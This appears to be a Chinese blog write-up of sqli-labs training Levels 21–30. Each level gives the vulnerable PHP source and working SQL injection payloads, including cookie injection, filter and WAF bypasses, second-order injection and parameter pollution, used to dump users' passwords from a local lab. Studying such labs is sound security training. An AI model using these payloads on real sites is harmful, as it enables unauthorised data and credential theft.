SQLI-LAB 的 实战记录(Less 21 - Less 30)
来源:互联网 发布:苹果mac多少钱一台 编辑:程序博客网 时间:2024/05/22 01:42
- Less - 21 Cookie Injection- Error Based- complex - string
- Test
- Sourse Code
- Solution
- Less - 22 Cookie Injection- Error Based- Double Quotes - string
- Test
- Sourse Code
- Solution
- Less - 23 Error Based- no comments
- Test
- Sourse Code
- Solution
- Less - 24 Second Degree Injections
- Test
- Sourse Code
- Solution
- Less - 25 Trick with OR AND
- Test
- Sourse Code
- Solution
- Less - 25a Trick with OR AND Blind
- Test
- Sourse Code
- Solution
- Less - 26 Trick with comments
- Test
- Sourse Code
- Solution
- Less - 26a Trick with comments
- Test
- Sourse Code
- Solution
- Less - 27 Trick with SELECT UNION
- Test
- Sourse Code
- Solution
- Less - 27a Trick with SELECT UNION
- Test
- Sourse Code
- Solution
- Less - 28 Trick with SELECT UNION
- Test
- Sourse Code
- Solution
- Less - 28a Trick with SELECT UNION
- Test
- Sourse Code
- Solution
- Less - 29 Protection with WAF
- Test
- Sourse Code
- Solution
- Less - 30 Protection with WAF
- Test
- Sourse Code
- Solution
以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 21 Cookie Injection- Error Based- complex - string
(第21节:cookie注入 – 基于错误 – 复杂 - 字符串)
Test:
http://localhost/sqli-lab/Less-21/index.php uname=Dumb&passwd=Dumb&submit=Submit
YOUR COOKIE : uname = RHVtYg== and expires: Sat 16 Jul 2016 - 08:32:26
注: RHVtYg== 是 Dumb 经Base64加密后的值(密文后两位或一位 等于号 的 就可以考虑 Base64)
Base64编码/解码器 在线解码
RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”Dumb\’) LIMIT 0,1’ at line 1
注: RHVtYlw= 是cookie中uname的值,明文 Dumb\
可以断定uname是有 一层单引号和一层括号 包裹
Sourse Code:
无cookie时 登录部分$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1){ setcookie('uname', base64_encode($row1['username']), time()+3600); print_r(mysql_error()); echo '<img src="../images/flag.jpg" />';}else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }有cookie时 登录部分:$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600;echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);$cookee = base64_decode($cookee);$sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";$result=mysql_query($sql);if (!$result) { die('Issue with your mysql: ' . mysql_error());}$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password']; echo 'Your ID:' .$row['id'];} else{ echo '<img src="../images/slap1.jpg" />';}
Solution:
') or 1=1 #Jykgb3IgMT0xICM=其它:JykgdW5pb24gc2VsZWN0IDEsZGF0YWJhc2UoKSw2IG9yIDE9MSAj明文 ') union select 1,database(),6 or 1=1 #JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=明文 ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lKSxncm91cF9jb25jYXQocGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMgICM=明文 ') union select 1,group_concat(username),group_concat(password) from security.users #
注:以上均为cookie中uname的值
Less - 22 Cookie Injection- Error Based- Double Quotes - string
(第22节:cookie注入 – 基于错误 – 双引号 - 字符串)
Test:
http://localhost/sqli-lab/Less-21/index.php uname=Dumb&passwd=Dumb&submit=Submit RHVtYlw=
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘“Dumb\” LIMIT 0,1’ at line 1
注: RHVtYlw= 是cookie中uname的值,明文 Dumb\
可以断定uname是有 一层双引号 包裹
Sourse Code:
无cookie登录时:$uname = check_input($_POST['uname']);$passwd = check_input($_POST['passwd']);$sql="SELECT users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";$result1 = mysql_query($sql);$row1 = mysql_fetch_array($result1);if($row1) { setcookie('uname', base64_encode($row1['username']), time()+3600); print_r(mysql_error()); echo '<img src="../images/flag.jpg" />';}else{ print_r(mysql_error()); echo '<img src="../images/slap.jpg" />'; }有cookie登录时:$cookee = $_COOKIE['uname'];$format = 'D d M Y - H:i:s';$timestamp = time() + 3600; echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR']; echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);$cookee = base64_decode($cookee);$cookee1 = '"'. $cookee. '"';$sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";$result=mysql_query($sql);if (!$result) { die('Issue with your mysql: ' . mysql_error());}$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password']; echo 'Your ID:' .$row['id'];} else{ echo '<img src="../images/slap1.jpg" />';}
Solution:
IiBvciAxPTEgIw==明文 " or 1=1 #其它:IiB1bmlvbiBzZWxlY3QgMSxkYXRhYmFzZSgpLDYgb3IgMT0xICM=明文 " union select 1,database(),6 or 1=1 #IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==明文 " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodXNlcm5hbWUpLGdyb3VwX2NvbmNhdChwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyAgIw==明文 " union select 1,group_concat(username),group_concat(password) from security.users #
注:以上均为cookie中uname的值
Less - 23 Error Based- no comments
(第23节: 基于错误 – 无评论)
Test:
http://localhost/sqli-lab/Less-23/index.php?id=2'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注:能推断出 $id 周围是单引号
Sourse Code:
//filter the comments out so as to comments should not work$reg = "/#/";$reg1 = "/--/";$replace = "";$id = preg_replace($reg, $replace, $id);$id = preg_replace($reg1, $replace, $id);$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];}else{ print_r(mysql_error());}
Solution:
' or '1' = ' http://localhost/sqli-lab/Less-23/index.php?id=' or '1' = ' 其它: http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,version(),3 or '1' = ' http://localhost/sqli-lab/Less-23/index.php?id=' union select 1,group_concat(username),group_concat(password) from users where 1 or '1' = '
Less - 24 Second Degree Injections
(第24节:二次注入)
Test:
http://localhost/sqli-lab/Less-24/index.php username=wolf password=1111
注:因为sqli-lab出的时间比较早,所用的php版本也比较早(可能是5.2),其中用到的一些函数已被废除,所以需要修改成类似的。
Sourse Code:
login_create.php $link = mysqli_connect('localhost', 'root', '', 'security'); $username= mysqli_real_escape_string($link,$_POST['username']) ; $pass= mysqli_real_escape_string($link,$_POST['password']); $re_pass= mysqli_real_escape_string($link,$_POST['re_password']); $sql = "insert into users (username, password) values(\"$username\", \"$pass\")";login.php $link = mysqli_connect('localhost', 'root', '', 'security'); $username = mysqli_real_escape_string($link,$_POST["login_user"]); $password = mysqli_real_escape_string($link,$_POST["login_password"]); $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
Solution:
username=admin" # password=1111 重置密码 改 1111 到 任意(比如666) username=admin password=666 即可
Less - 25 Trick with OR & AND
(第25节:用 OR 和 AND 欺骗)
Test:
http://localhost/sqli-lab/Less-25/index.php?id=1' #
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” LIMIT 0,1’ at line 1
注:id周围是单引号
http://localhost/sqli-lab/Less-25/index.php?id=1' --+
注:无报错
Sourse Code:
function blacklist($id){ $id= preg_replace('/or/i',"", $id); $id= preg_replace('/AND/i',"", $id); return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{ print_r(mysql_error());}
注:and和or会被过滤,有报错,$id被单引号包围
Solution:
http://localhost/sqli-lab/Less-25/index.php?id=0' oorr 1=1 --+ http://localhost/sqli-lab/Less-25/index.php?id=2' aandnd 1=1 --+ 其它: http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,version(),database()--+ http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+ http://localhost/sqli-lab/Less-25/index.php?id=0' union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
注:过滤了and和or,但只有一次,所以多重复就好
Less - 25a Trick with OR & AND Blind
(第25节a:用 OR 和 AND 欺骗 与盲注)
Test:
http://localhost/sqli-lab/Less-25a/index.php?id=1 http://localhost/sqli-lab/Less-25a/index.php?id=2' http://localhost/sqli-lab/Less-25a/index.php?id=2" http://localhost/sqli-lab/Less-25a/index.php?id=2 oorr 1=1 #
注:id 周围没有符号 有 or 和 and 过滤
Sourse Code:
function blacklist($id){ $id= preg_replace('/or/i',"", $id); $id= preg_replace('/AND/i',"", $id); return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{}
注:and和or会被过滤,无报错
Solution:
http://localhost/sqli-lab/Less-25a/index.php?id=0 oorr 1=1 --+ http://localhost/sqli-lab/Less-25a/index.php?id=2 aandnd 1=1 --+ 其它: http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,version(),database() --+ http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security' --+ http://localhost/sqli-lab/Less-25a/index.php?id=0 union select 1,group_concat(username),group_concat(passwoorrd) from security.users --+
Less - 26 Trick with comments
(第26节:用 评论 欺骗)
Test:
http://localhost/sqli-lab/Less-26/index.php?id=0'")And AND and or OR select union /// #--/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)selectunion’ LIMIT 0,1’ at line 1
注:id周围只有单引号,过滤得只剩”)selectunion
Sourse Code:
function blacklist($id) { $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out -- $id= preg_replace('/[#]/',"", $id); //Strip out # $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];}else{ print_r(mysql_error());}
注:$id 周围是单引号,过滤了 or,and , /* , – , # , 空格 , /
Solution:
http://localhost/sqli-lab/Less-26/index.php?id=1'%26%26'1 其它: http://localhost/sqli-lab/Less-26/index.php?id=0'%A0UNION%A0SELECT%A01,version(),database()%26%26%a0'1 http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0'1 http://localhost/sqli-lab/Less-26/index.php?id=0'%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0'1
注:用%A0替代空格使用,用&&(%26%26)替代AND使用
Less - 26a Trick with comments
(第26a节:用 评论 欺骗)
Test:
http://localhost/sqli-lab/Less-26a/index.php?id=1')")And AND and or OR select union /// #--/*+
注:被过滤得只剩’)”)selectunion 无sql查询报错
http://localhost/sqli-lab/Less-26a/index.php?id=1'%A0%26%26%A0 '1'='1 http://localhost/sqli-lab/Less-26a/index.php?id=1"%A0%26%26%A0 "1"="1 http://localhost/sqli-lab/Less-26a/index.php?id=1")%A0%26%26%A0 ("1")=("1
注:都不报错,不知道格式是什么
http://localhost/sqli-lab/Less-26a/index.php?id=0'%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0'1
注:都有php的报错,可能格式错了,查询不到
http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1
注:这次对了
Sourse Code:
function blacklist($id){ $id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive) $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out -- $id= preg_replace('/[#]/',"", $id); //Strip out # $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\s]/',"", $id); //Strip out spaces $id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{}
注:$id 周围是单引号和括号,过滤了 or,and , /* , – , # , 空格 , /
Solution:
http://localhost/sqli-lab/Less-26a/index.php?id=1')%A0UNION%A0SELECT%A01,2,3%A0%26%26%A0('1 其它: http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0UNION%A0SELECT%A01,version(),database()%26%26%a0('1 http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(table_name),3%A0from%A0infoorrmation_schema.tables%A0where%A0table_schema='security'%26%26%a0('1 http://localhost/sqli-lab/Less-26a/index.php?id=0')%A0union%A0select%A01,group_concat(username),group_concat(passwoorrd)%A0from%A0security%2Eusers%A0where%A01%A0%26%26%a0('1
Less - 27 Trick with SELECT & UNION
(第27节:用 UNION 和 SELECT 欺骗)
Test:
http://localhost/sqli-lab/Less-27/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”)AndANDandorOROror’ LIMIT 0,1’ at line 1
注:Id的周围是单引号,会过滤union和select及有注释作用的符号
Sourse Code:
function blacklist($id){ $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union/s',"", $id); //Strip out union $id= preg_replace('/select/s',"", $id); //Strip out select $id= preg_replace('/UNION/s',"", $id); //Strip out UNION $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT $id= preg_replace('/Union/s',"", $id); //Strip out Union $id= preg_replace('/Select/s',"", $id); //Strip out select return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{ print_r(mysql_error()); }
Solution:
http://localhost/sqli-lab/Less-27/index.php?id=0'%A0or(1)=(1)%26%26%a0'1 其它: http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0'1 http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0'1 http://localhost/sqli-lab/Less-27/index.php?id=0'%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0'1
Less - 27a Trick with SELECT & UNION
(第27a节:用 UNION 和 SELECT 欺骗)
Test:
http://localhost/sqli-lab/Less-27a/index.php?id=0'")And AND and or OR Or or Select SELECT select UNION union Union Union /// #--?/*+
注:无sql查询报错,过滤后还剩 0’”)AndANDandorOROror
Sourse Code:
function blacklist($id){ $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/select/m',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union/s',"", $id); //Strip out union $id= preg_replace('/select/s',"", $id); //Strip out select $id= preg_replace('/UNION/s',"", $id); //Strip out UNION $id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT $id= preg_replace('/Union/s',"", $id); //Strip out Union $id= preg_replace('/Select/s',"", $id); //Strip out Select return $id;}$id= blacklist($id);$hint=$id;$id = '"' .$id. '"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{}
Solution:
http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0or(1)=(1)%26%26%a0"1 其它: http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0"1 http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0"1 http://localhost/sqli-lab/Less-27a/index.php?id=0"%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0"1
Less - 28 Trick with SELECT & UNION
(第28节:用 UNION 和 SELECT 欺骗 )
Test:
http://localhost/sqli-lab/Less-28/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
注: 过滤了union空格select 这种组合与全部空格,无sql查询报错
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect
注:UnIon%A0SeLect 中间不是空格了,没被过滤
http://localhost/sqli-lab/Less-28/index.php?id=0'%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0'
注:有php报错
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0('
注:这个对了,说明id周围是单引号和括号
Sourse Code:
function blacklist($id){ $id= preg_replace('/[\/\*]/',"", $id); //strip out /* $id= preg_replace('/[--]/',"", $id); //Strip out --. $id= preg_replace('/[#]/',"", $id); //Strip out #. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/[ +]/',"", $id); //Strip out spaces. $id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT. return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row){ echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];}else{}
Solution:
http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIon%A0SeLect(1),2,3%A0%26%26%A0(' 其它: http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),version(),database()%26%26%a0('1 http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(table_name),3%A0from%A0information_schema.tables%A0where%A0table_schema='security'%26%26%a0('1 http://localhost/sqli-lab/Less-28/index.php?id=0')%A0UnIoN%A0SeLeCt(1),group_concat(username),group_concat(password)%A0from%A0security%2Eusers%A0where%A01%26%26%a0('1
Less - 28a Trick with SELECT & UNION
(第28节a:用 UNION 和 SELECT 欺骗 )
Test:
http://localhost/sqli-lab/Less-28a/index.php?id=0'")And AND and or OR Or or UNION union Union Select SELECT select /// #--?/*+
注: 过滤了union空格select 这种组合,无sql查询报错
http://localhost/sqli-lab/Less-28a/index.php?id=1') --
注: 正常显示,没过滤空格和有注释作用的符号
Sourse Code:
function blacklist($id){ $id= preg_replace('/union\s+select/i',"", $id); return $id;}$id= blacklist($id);$hint=$id;$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{ }
Solution:
http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,2,3--+ 其它: http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,version(),database()--+ http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ http://localhost/sqli-lab/Less-28a/index.php?id=0') UnIon%A0SeLect 1,group_concat(username),group_concat(password) from security.users where 1--+
Less - 29 Protection with WAF
(第29节:用WAF防护)
Test:
http://localhost/sqli-lab/Less-29/login.php?id=0' union select 1,2,3 --+
注:被检测到有问题,跳转到其他的页面了
Sourse Code:
login.php//WAF implimentation with a whitelist approach..... only allows input to be Numeric.function whitelist($input) { $match = preg_match("/^\d+$/", $input); if($match) { }else { header('Location: hacked.php'); }}// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).function java_implimentation($query_string) { $q_s = $query_string; $qs_array= explode("&",$q_s); foreach($qs_array as $key => $value) { $val=substr($value,0,2); if($val=="id") { $id_value=substr($value,3,30); return $id_value; echo "<br>"; break; } }}$qs = $_SERVER['QUERY_STRING'];$hint=$qs;$id1=java_implimentation($qs);$id=$_GET['id'];whitelist($id1);$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{ print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,2,3 --+ 其它: http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,version(),database() --+ http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ http://localhost/sqli-lab/Less-29/login.php?id=1&id=' union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
Less - 30 Protection with WAF
(第30节:用WAF防护)
Test:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=6
注:显示的是id为6的内容
Sourse Code:
$qs = $_SERVER['QUERY_STRING'];$hint=$qs;$id1=java_implimentation($qs);$id=$_GET['id'];whitelist($id1);$id = '"' .$id. '"';$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);if($row) { echo 'Your Login name:'. $row['username']; echo 'Your Password:' .$row['password'];} else{ print_r(mysql_error());}//WAF implimentation with a whitelist approach..... only allows input to be Numeric.function whitelist($input) { $match = preg_match("/^\d+$/", $input); if($match) { } else { header('Location: hacked.php'); }}// The function below immitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).function java_implimentation($query_string) { $q_s = $query_string; $qs_array= explode("&",$q_s); foreach($qs_array as $key => $value) { $val=substr($value,0,2); if($val=="id") { $id_value=substr($value,3,30); return $id_value; break; } }}
Solution:
http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,2,3 --+ 其它: http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,version(),database() --+ http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+ http://localhost/sqli-lab/Less-30/login.php?id=1&id=" union select 1,group_concat(username),group_concat(password) from security.users where 1 --+
- SQLI-LAB 的 实战记录(Less 21 - Less 30)
- SQLI-LAB 的 实战记录(Less 1 - Less 10)
- SQLI-LAB 的 实战记录(Less 11 - Less 20)
- SQLI-LAB 的 实战记录(Less 31 - Less 40)
- SQLI-LAB 的 实战记录(Less 41 - Less 53)
- SQLI-LAB 的 实战记录(Less 54 - Less 65)
- SQLi-Labs 学习笔记(Less 21-30)
- sqli-labs ---- Less-2
- sqli-labs ---- Less-7
- sqli-labs ---- Less-5 & Less-6
- sqli-labs ---- Less-1 & Less-3 & Less-4
- sqli-labs ---- Less-8 & Less-9 & Less-10
- sqli-labs ---- Less-8 & Less-9 & Less-10
- [sqli-labs]Less-1(明注)
- 【SQL注入之sqli-labs】Less 1
- 【SQL注入之sqli-labs】Less 6
- less
- less
- session共享问题
- div怎么撑开外面的div让高度自适应
- P12文件解析
- Opencv MAT类
- [Cloud Computing]Mechanisms: Public Key Infrastructure
- SQLI-LAB 的 实战记录(Less 21 - Less 30)
- python学习——异步IO
- 用Quartz处理定时执行的任务
- WebService
- java/反射/JDK新特性
- lintcode add-two-numbers 链表求和
- linux下安装tuxedo
- adb 删除 andriod下的app
- Tomcat配置外置路径